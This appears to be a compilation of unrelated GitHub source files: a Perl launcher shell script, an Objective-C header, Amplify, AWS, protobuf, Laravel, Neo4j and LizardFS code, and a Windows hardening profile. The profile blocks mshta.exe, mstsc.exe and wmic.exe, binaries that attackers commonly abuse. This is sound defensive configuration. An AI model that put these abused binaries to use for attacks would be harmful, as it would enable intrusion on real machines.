mailerr $user "Can't log to TRE_LOG=$TRE_LOG. Fix environment." | /usr/lib/sendmail $user
fi
else
die "TRE_LOG environment variable is not set."
fi
fi
# TRE_ULOG is optional user log. EMAIL address is recommended.
if [ ! -z "$TRE_ULOG" ] ; then
# Check first if TRE_ULOG is a file (this is cheap).
if [ -f $TRE_ULOG -a -w $TRE_ULOG ] ; then
echo "#" >> $TRE_ULOG
loginfo >> $TRE_ULOG
elif /usr/lib/sendmail -bv $TRE_ULOG 1>&- 2>&- ; then
mailinfo $TRE_ULOG | /usr/lib/sendmail $TRE_ULOG
else
mailerr $user "Can't log to TRE_ULOG=$TRE_ULOG. Fix environment." | /usr/lib/sendmail $user
fi
fi
}
die () {
message="$1"
echo "$tool -> perl_wrapper: $message Exiting ..."
if [ ! -z "$TRE_LOG" ] ; then
if [ -f ${TRE_LOG} -a -w ${TRE_LOG} ] ; then
echo "#" >> $TRE_LOG
echo "ERROR: $message" >> $TRE_LOG
loginfo >> $TRE_LOG
elif /usr/lib/sendmail -bv $TRE_LOG 1>&- 2>&- ; then
mailerr $TRE_LOG "$message" | /usr/lib/sendmail $TRE_LOG
else
echo "Can not log to TRE_LOG=${TRE_LOG}. Logging to '$user.'"
mailerr $user "$message" | /usr/lib/sendmail $user
fi
fi
# TRE_ULOG is optional user log. EMAIL address is recommended.
if [ ! -z "$TRE_ULOG" ] ; then
if [ -f ${TRE_ULOG} -a -w ${TRE_ULOG} ] ; then
echo "#" >> $TRE_ULOG
echo "ERROR: $message" >> $TRE_ULOG
loginfo >> $TRE_ULOG
elif /usr/lib/sendmail -bv $TRE_ULOG 1>&- 2>&- ; then
mailerr $TRE_ULOG "$message" | /usr/lib/sendmail $TRE_ULOG
else
echo "Can not log to TRE_ULOG=${TRE_ULOG}. Logging to '$user.'"
mailerr $user "$message" | /usr/lib/sendmail $user
fi
fi
exit 1
}
############################ main ##############################
tool=`basename $0`
ARGV="$*"
TRE_PROJECT=$DV_ROOT
if [ -z "$TRE_PROJECT" ]; then
die "TRE_PROJECT not defined"
fi
TRE_ROOT=$TRE_PROJECT/tools/perlmod
### Verify TRE_SEARCH and TRE_ENTRY are defined and non-null
if [ -z "$TRE_SEARCH" ]; then
die "TRE_SEARCH not defined"
fi
if [ -z "$TRE_ENTRY" ]; then
die "TRE_ENTRY not defined"
fi
### Get version, based on tool invoked, and $TRE_ENTRY
if [ $tool = "configsrch" ] ; then
exe=$TRE_ROOT/$tool
exec $exe "$@"
exit
else
version=`configsrch $tool $TRE_ENTRY 2>&1`
stat=$?
if [ $stat != 0 ] ; then
die "configsrch returned error code $stat"
fi
### Verify configsrch delivered a non-null version
if [ -z "$version" ]; then
die "No version set by configsrch"
fi
fi
### Assemble do-file name. If it's there, execute and test status.
exe=$TRE_ROOT/$tool,$version.do
if [ -x $exe ]; then
$exe
dostat=$?
if [ $? != 0 ] ; then
die "Error return from do file"
fi
fi
OS=`uname -s`
if [ $OS = "SunOS" ] ; then
user=`/usr/ucb/whoami`
CPU=`uname -p`
fi
if [ $OS = "Linux" ]; then
user=`/usr/bin/whoami`
CPU=`uname -m`
fi
if [ -z "$PERL_VER" ] ; then
if [ -z "$PERL5OPT" ] ; then
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU"
else
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU $PERL5OPT"
fi
else
if [ -z "$PERL5OPT" ] ; then
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU -I$PERL5_PATH/$PERL_VER -I$PERL5_PATH/$PERL_VER/sun4-solaris"
else
PERL5OPT="-I$PERL_MODULE_BASE -I$PERL_MODULE_BASE/$OS-$CPU -I$PERL5_PATH/$PERL_VER -I$PERL5_PATH/$PERL_VER/sun4-solaris $PERL5OPT"
fi
fi
export PERL5OPT
exe=$TRE_ROOT/$tool,$version
if [ -x $exe ]; then
exec $PERL_CMD $exe "$@"
else
die "executable $exe not found!"
fi
| {
"pile_set_name": "Github"
} |
/**
* This header is generated by class-dump-z 0.2b.
*
* Source: /System/Library/PrivateFrameworks/OfficeImport.framework/OfficeImport
*/
#import <OfficeImport/XXUnknownSuperclass.h>
__attribute__((visibility("hidden")))
@interface OCXSStreamLevel : XXUnknownSuperclass {
@private
char *mName; // 4 = 0x4
int mDepth; // 8 = 0x8
}
@property(assign, nonatomic) char *name; // G=0x2c9955; S=0x191b79; @synthesize=mName
@property(assign, nonatomic) int depth; // G=0x191d09; S=0x191b89; @synthesize=mDepth
// declared property getter: - (int)depth; // 0x191d09
// declared property setter: - (void)setDepth:(int)depth; // 0x191b89
// declared property getter: - (const char *)name; // 0x2c9955
// declared property setter: - (void)setName:(const char *)name; // 0x191b79
@end
| {
"pile_set_name": "Github"
} |
const testUtil = require('../../lib');
module.exports = {
name: 'storage',
run: async function(context) {
if (context.parameters.options.help) {
const header = `amplify mock ${this.name} \nDescriptions:
Mock Storage locally`;
context.amplify.showHelp(header, []);
return;
}
try {
await testUtil.storage.start(context);
} catch (e) {
context.print.error(e.message);
}
},
};
| {
"pile_set_name": "Github"
} |
Få Nutriscore
| {
"pile_set_name": "Github"
} |
test
tes
tes
| {
"pile_set_name": "Github"
} |
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/ecs/ECS_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSString.h>
namespace Aws
{
namespace ECS
{
namespace Model
{
enum class ProxyConfigurationType
{
NOT_SET,
APPMESH
};
namespace ProxyConfigurationTypeMapper
{
AWS_ECS_API ProxyConfigurationType GetProxyConfigurationTypeForName(const Aws::String& name);
AWS_ECS_API Aws::String GetNameForProxyConfigurationType(ProxyConfigurationType value);
} // namespace ProxyConfigurationTypeMapper
} // namespace Model
} // namespace ECS
} // namespace Aws
| {
"pile_set_name": "Github"
} |
IsMshta.exeBlocked
IsMstsc.exeBlocked
IsWmic.exeBlocked
;********* Beginning of ini section *********
SKIN=MAmbre
ListColor=14671585
White List
Skip DLLs
ON
ON
ON
OFF
OFF
OFF
OFF
Standard User
ON
ON
ON
OFF3
OFF
ON1
OFF
OFF
Adobe + VBA
ON
OFF
OFF
OFF
ON
END
;********* Beginning of profile info section *********
Harden Windows 10 while maintaining maximum functionality and compatibility (proposed on Malwaretips forum by @Windows_Security).
Settings applied: "Recommended Settings" for Windows 10 + "allowed EXE and MSI files in UserSpace" + "three blocked Sponsors" + "Windows Scripts allowed with admin rights" + "only signed executables can elevate" + "Run By SmartScreen"
Please note: This profile allow installing/executing/updating unsigned applications only if they do not require Administrative rights. There are no such restrictions for signed applications.
In this profile, most applications can auto-update. The EXE and MSI application installers can be run normally because they are allowed by SRP.
It is recommended to use this profile with ConfigureDefender HIGH Protection Level (if WD is the main antivirus) and "Recommended H_C" firewall outbound block rules (see <FirewallHardening> option).
The profile works best when the user installs digitally signed applications (EXE / MSI). The unsigned applications which do not require Administrative rights can be run safely via "Run By SmartScreen" entry from the right-click Explorer context menu.
When the unsigned file is blocked because it cannot elevate, the Error message is displayed which ends with:
"... A referral was returned from the server". | {
"pile_set_name": "Github"
} |
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// http://code.google.com/p/protobuf/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// Author: [email protected] (Brian Duff)
// Based on original Protocol Buffers design by
// Sanjay Ghemawat, Jeff Dean, and others.
#ifndef GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
#define GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
#include <google/protobuf/stubs/common.h>
#include <google/protobuf/compiler/javanano/javanano_params.h>
#include <google/protobuf/descriptor.pb.h>
namespace google {
namespace protobuf {
namespace io {
class Printer; // printer.h
}
}
namespace protobuf {
namespace compiler {
namespace javanano {
class ExtensionGenerator {
public:
explicit ExtensionGenerator(const FieldDescriptor* descriptor, const Params& params);
~ExtensionGenerator();
void Generate(io::Printer* printer) const;
private:
const Params& params_;
const FieldDescriptor* descriptor_;
std::map<string, string> variables_;
GOOGLE_DISALLOW_EVIL_CONSTRUCTORS(ExtensionGenerator);
};
} // namespace javanano
} // namespace compiler
} // namespace protobuf
} // namespace google
#endif // GOOGLE_PROTOBUF_COMPILER_JAVANANO_EXTENSION_H_
| {
"pile_set_name": "Github"
} |
<?php
/*
|--------------------------------------------------------------------------
| Model Factories
|--------------------------------------------------------------------------
|
| Here you may define all of your model factories. Model factories give
| you a convenient way to create models for testing and seeding your
| database. Just tell the factory how a default model should look.
|
*/
/** @var \Illuminate\Database\Eloquent\Factory $factory */
$factory->define(App\User::class, function (Faker\Generator $faker) {
static $password;
return [
'name' => $faker->name,
'email' => $faker->unique()->safeEmail,
'password' => $password ?: $password = bcrypt('secret'),
'remember_token' => str_random(10),
];
});
$factory->define(App\Post::class, function(Faker\Generator $faker) {
return [
'title' => $faker->realText(rand(40, 80)),
'body' => $faker->realText(rand(200, 6000)),
'user_id' => function() {
return \App\User::inRandomOrder()->first()->id;
}
];
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2002-2020 "Neo4j,"
* Neo4j Sweden AB [http://neo4j.com]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.neo4j.cypher.internal.parser.privilege
class DbmsPrivilegeRevokeDenyTests extends DbmsPrivilegeAdministrationCommandParserTest {
privilegeTests("REVOKE DENY", "FROM", revokeDenyDbmsPrivilege)
}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2013-2016 Skytechnology sp. z o.o.
This file is part of LizardFS.
LizardFS is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 3.
LizardFS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with LizardFS. If not, see <http://www.gnu.org/licenses/>.
*/
#include "common/platform.h"
#include "common/read_plan_executor.h"
#include <chrono>
#include <map>
#include <set>
#include "common/block_xor.h"
#include "common/chunkserver_stats.h"
#include "common/exceptions.h"
#include "common/lambda_guard.h"
#include "common/lizardfs_version.h"
#include "common/massert.h"
#include "common/mfserr.h"
#include "common/read_operation_executor.h"
#include "common/sockets.h"
#include "common/time_utils.h"
#include "devtools/request_log.h"
#include "protocol/cltocs.h"
std::atomic<uint64_t> ReadPlanExecutor::executions_total_;
std::atomic<uint64_t> ReadPlanExecutor::executions_with_additional_operations_;
std::atomic<uint64_t> ReadPlanExecutor::executions_finished_by_additional_operations_;
ReadPlanExecutor::ReadPlanExecutor(ChunkserverStats &chunkserver_stats, uint64_t chunk_id,
uint32_t chunk_version, std::unique_ptr<ReadPlan> plan)
: stats_(chunkserver_stats),
chunk_id_(chunk_id),
chunk_version_(chunk_version),
plan_(std::move(plan)) {
}
/*! \brief A function which starts single read operation from chunkserver.
*
* \param params Execution parameters pack.
* \param chunk_type Chunk part type to start read read operation for.
* \param op Structure describing read operation.
*
* \return true on success.
* false on failure.
*/
bool ReadPlanExecutor::startReadOperation(ExecuteParams ¶ms, ChunkPartType chunk_type,
const ReadPlan::ReadOperation &op) {
#ifndef NDEBUG
auto it = std::find(networking_failures_.begin(), networking_failures_.end(), chunk_type);
assert(it == networking_failures_.end());
assert(params.locations.count(chunk_type));
#endif
if (op.request_size <= 0) {
available_parts_.push_back(chunk_type);
return true;
}
const ChunkTypeWithAddress &ctwa = params.locations.at(chunk_type);
stats_.registerReadOperation(ctwa.address);
try {
Timeout connect_timeout(std::chrono::milliseconds(params.connect_timeout));
int fd = params.connector.startUsingConnection(ctwa.address, connect_timeout);
try {
if (params.total_timeout.expired()) {
// totalTimeout might expire during establishing the connection
throw RecoverableReadException("Chunkserver communication timed out");
}
ReadOperationExecutor executor(op, chunk_id_, chunk_version_, chunk_type, ctwa.address,
ctwa.chunkserver_version, fd, params.buffer);
executor.sendReadRequest(connect_timeout);
executors_.insert(std::make_pair(fd, std::move(executor)));
} catch (...) {
tcpclose(fd);
throw;
}
return true;
} catch (ChunkserverConnectionException &ex) {
last_connection_failure_ = ctwa.address;
stats_.markDefective(ctwa.address);
networking_failures_.push_back(chunk_type);
return false;
}
}
/*! \brief A function which starts a new prefetch operation.
*
* \param params Execution parameters pack.
* \param chunk_type Chunk part type to start prefetch read operation for.
* \param op Structure describing prefetch operation.
*/
void ReadPlanExecutor::startPrefetchOperation(ExecuteParams ¶ms, ChunkPartType chunk_type,
const ReadPlan::ReadOperation &op) {
assert(params.locations.count(chunk_type));
if (op.request_size <= 0) {
return;
}
const ChunkTypeWithAddress &ctwa = params.locations.at(chunk_type);
try {
Timeout connect_timeout(std::chrono::milliseconds(params.connect_timeout));
int fd = params.connector.startUsingConnection(ctwa.address, connect_timeout);
try {
if (params.total_timeout.expired()) {
// totalTimeout might expire during establishing the connection
throw RecoverableReadException("Chunkserver communication timed out");
}
std::vector<uint8_t> message;
if (ctwa.chunkserver_version >= kFirstECVersion) {
cltocs::prefetch::serialize(message, chunk_id_, chunk_version_, chunk_type,
op.request_offset, op.request_size);
} else if (ctwa.chunkserver_version >= kFirstXorVersion) {
assert((int)chunk_type.getSliceType() < Goal::Slice::Type::kECFirst);
cltocs::prefetch::serialize(message, chunk_id_, chunk_version_,
(legacy::ChunkPartType)chunk_type, op.request_offset,
op.request_size);
}
if (message.size() > 0) {
int32_t ret =
tcptowrite(fd, message.data(), message.size(), connect_timeout.remaining_ms());
if (ret != (int32_t)message.size()) {
throw ChunkserverConnectionException(
"Cannot send PREFETCH request to the chunkserver: " +
std::string(strerr(tcpgetlasterror())),
ctwa.address);
}
}
} catch (...) {
tcpclose(fd);
throw;
}
params.connector.endUsingConnection(fd, ctwa.address);
} catch (ChunkserverConnectionException &ex) {
// That's a pity
}
}
/*! \brief A function that starts all read operations for a wave.
*
* \param params Execution parameters pack.
* \param wave Wave index.
*
* \return Number of failed read operations.
*/
int ReadPlanExecutor::startReadsForWave(ExecuteParams ¶ms, int wave) {
int failed_reads = 0;
for (const auto &read_operation : plan_->read_operations) {
if (read_operation.second.wave == wave) {
if (!startReadOperation(params, read_operation.first, read_operation.second)) {
++failed_reads;
}
}
}
if (!plan_->isFinishingPossible(networking_failures_)) {
throw RecoverableReadException("Can't connect to " + last_connection_failure_.toString());
}
return failed_reads;
}
/*! \brief A function that starts all prefetch operations for a wave.
*
* \param params Execution parameters pack.
* \param wave Wave index.
*/
void ReadPlanExecutor::startPrefetchForWave(ExecuteParams ¶ms, int wave) {
if (plan_->disable_prefetch) {
return;
}
for (const auto &prefetch_operation : plan_->read_operations) {
if (prefetch_operation.second.wave == wave) {
startPrefetchOperation(params, prefetch_operation.first, prefetch_operation.second);
}
}
}
/*! \brief Function waits for data from chunkservers.
*
* \param params Execution parameters pack.
* \param wave_timeout Timeout class keeping time to end of current wave.
* \param poll_fds Vector with pollfds structures resulting from call to poll system function.
* \return true on success
* false EINTR occurred (call to waitForData should be repeated)
*/
bool ReadPlanExecutor::waitForData(ExecuteParams ¶ms, Timeout &wave_timeout,
std::vector<pollfd> &poll_fds) {
// Prepare for poll
poll_fds.clear();
for (const auto &fd_and_executor : executors_) {
poll_fds.push_back({fd_and_executor.first, POLLIN, 0});
}
if (poll_fds.empty()) {
return true;
}
// Call poll
int poll_timeout = std::max(
0, (int)std::min(params.total_timeout.remaining_ms(), wave_timeout.remaining_ms()));
int status = tcppoll(poll_fds, poll_timeout);
if (status < 0) {
#ifdef _WIN32
throw RecoverableReadException("Poll error: " + std::string(strerr(tcpgetlasterror())));
#else
if (errno == EINTR) {
return false;
} else {
throw RecoverableReadException("Poll error: " + std::string(strerr(tcpgetlasterror())));
}
#endif
}
return true;
}
/*! \brief Read data from chunkserver.
*
* \param params Execution parameters pack.
* \param poll_fd pollfd structure with the IO events.
* \param executor Executor for which some data are available.
*/
bool ReadPlanExecutor::readSomeData(ExecuteParams ¶ms, const pollfd &poll_fd,
ReadOperationExecutor &executor) {
const NetworkAddress &server = executor.server();
try {
if (poll_fd.revents & POLLIN) {
executor.continueReading();
} else if (poll_fd.revents & (POLLHUP | POLLERR | POLLNVAL)) {
throw ChunkserverConnectionException("Read from chunkserver (poll) error", server);
}
} catch (ChunkserverConnectionException &ex) {
stats_.markDefective(server);
networking_failures_.push_back(executor.chunkType());
tcpclose(poll_fd.fd);
executors_.erase(poll_fd.fd);
if (!plan_->isFinishingPossible(networking_failures_)) {
throw;
}
return false;
}
if (executor.isFinished()) {
stats_.unregisterReadOperation(server);
stats_.markWorking(server);
params.connector.endUsingConnection(poll_fd.fd, server);
available_parts_.push_back(executor.chunkType());
executors_.erase(poll_fd.fd);
}
return true;
}
/*! \brief Execute read operation (without post-process). */
void ReadPlanExecutor::executeReadOperations(ExecuteParams ¶ms) {
assert(!plan_->read_operations.empty());
int failed_reads;
int wave = 0;
// start reads for first wave (index 0)
failed_reads = startReadsForWave(params, wave);
startPrefetchForWave(params, wave + 1);
assert((executors_.size() + networking_failures_.size()) > 0);
// Receive responses
LOG_AVG_TILL_END_OF_SCOPE0("ReadPlanExecutor::executeReadOperations#recv");
Timeout wave_timeout(std::chrono::milliseconds(params.wave_timeout));
std::vector<pollfd> poll_fds;
while (true) {
if (params.total_timeout.expired()) {
if (!executors_.empty()) {
NetworkAddress offender = executors_.begin()->second.server();
throw RecoverableReadException("Chunkserver communication timed out: " +
offender.toString());
}
throw RecoverableReadException("Chunkservers communication timed out");
}
if (wave_timeout.expired() || failed_reads) {
// start next wave
executions_with_additional_operations_ += wave == 0;
++wave;
wave_timeout.reset();
failed_reads = startReadsForWave(params, wave);
startPrefetchForWave(params, wave + 1);
}
if (!waitForData(params, wave_timeout, poll_fds)) {
// EINTR occurred - we need to restart poll
continue;
}
if (poll_fds.empty()) {
// no more executors available, so it is best to start next wave
assert(plan_->isFinishingPossible(networking_failures_));
++failed_reads;
continue;
}
// Process poll's output -- read from chunkservers
for (pollfd &poll_fd : poll_fds) {
if (poll_fd.revents == 0) {
continue;
}
ReadOperationExecutor &executor = executors_.at(poll_fd.fd);
if (!readSomeData(params, poll_fd, executor)) {
++failed_reads;
}
}
// Check if we are finished now
if (plan_->isReadingFinished(available_parts_)) {
executions_finished_by_additional_operations_ += wave > 0;
break;
}
}
}
/*! \brief Debug function for checking if plan is valid. */
void ReadPlanExecutor::checkPlan(uint8_t *buffer_start) {
(void)buffer_start;
#ifndef NDEBUG
for (const auto &type_and_op : plan_->read_operations) {
assert(type_and_op.first.isValid());
const ReadPlan::ReadOperation &op(type_and_op.second);
assert(op.request_offset >= 0 && op.request_size >= 0);
assert((op.request_offset + op.request_size) <= MFSCHUNKSIZE);
assert(op.buffer_offset >= 0 &&
(op.buffer_offset + op.request_size) <= plan_->read_buffer_size);
if (op.request_size <= 0) {
continue;
}
for (const auto &type_and_op2 : plan_->read_operations) {
if (&type_and_op == &type_and_op2) {
continue;
}
const ReadPlan::ReadOperation &op2(type_and_op2.second);
bool overlap = true;
assert(type_and_op.first != type_and_op2.first);
if (op2.request_size <= 0) {
continue;
}
if (op.buffer_offset >= op2.buffer_offset &&
op.buffer_offset < (op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
if ((op.buffer_offset + op.request_size - 1) >= op2.buffer_offset &&
(op.buffer_offset + op.request_size - 1) <
(op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
if (op.buffer_offset < op2.buffer_offset &&
(op.buffer_offset + op.request_size) >= (op2.buffer_offset + op2.request_size)) {
assert(!overlap);
}
}
}
int post_size = 0;
for (const auto &post : plan_->postprocess_operations) {
assert(post.first >= 0);
post_size += post.first;
}
plan_->buffer_start = buffer_start;
plan_->buffer_read = buffer_start + plan_->readOffset();
plan_->buffer_end = buffer_start + plan_->fullBufferSize();
assert(plan_->buffer_read >= plan_->buffer_start && plan_->buffer_read < plan_->buffer_end);
assert(plan_->buffer_start < plan_->buffer_end);
#endif
}
void ReadPlanExecutor::executePlan(std::vector<uint8_t> &buffer,
const ChunkTypeLocations &locations, ChunkConnector &connector,
int connect_timeout, int level_timeout,
const Timeout &total_timeout) {
executors_.clear();
networking_failures_.clear();
available_parts_.clear();
++executions_total_;
std::size_t initial_size_of_buffer = buffer.size();
buffer.resize(initial_size_of_buffer + plan_->fullBufferSize());
checkPlan(buffer.data() + initial_size_of_buffer);
ExecuteParams params{buffer.data() + initial_size_of_buffer + plan_->readOffset(), locations,
connector, connect_timeout, level_timeout, total_timeout};
try {
executeReadOperations(params);
int result_size =
plan_->postProcessData(buffer.data() + initial_size_of_buffer, available_parts_);
buffer.resize(initial_size_of_buffer + result_size);
} catch (Exception &) {
for (const auto &fd_and_executor : executors_) {
tcpclose(fd_and_executor.first);
stats_.unregisterReadOperation(fd_and_executor.second.server());
}
buffer.resize(initial_size_of_buffer);
throw;
}
for (const auto &fd_and_executor : executors_) {
tcpclose(fd_and_executor.first);
stats_.unregisterReadOperation(fd_and_executor.second.server());
}
}
| {
"pile_set_name": "Github"
} |
.foo {
background-color: lightblue;
width: 100px;
height: 100px;
}
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.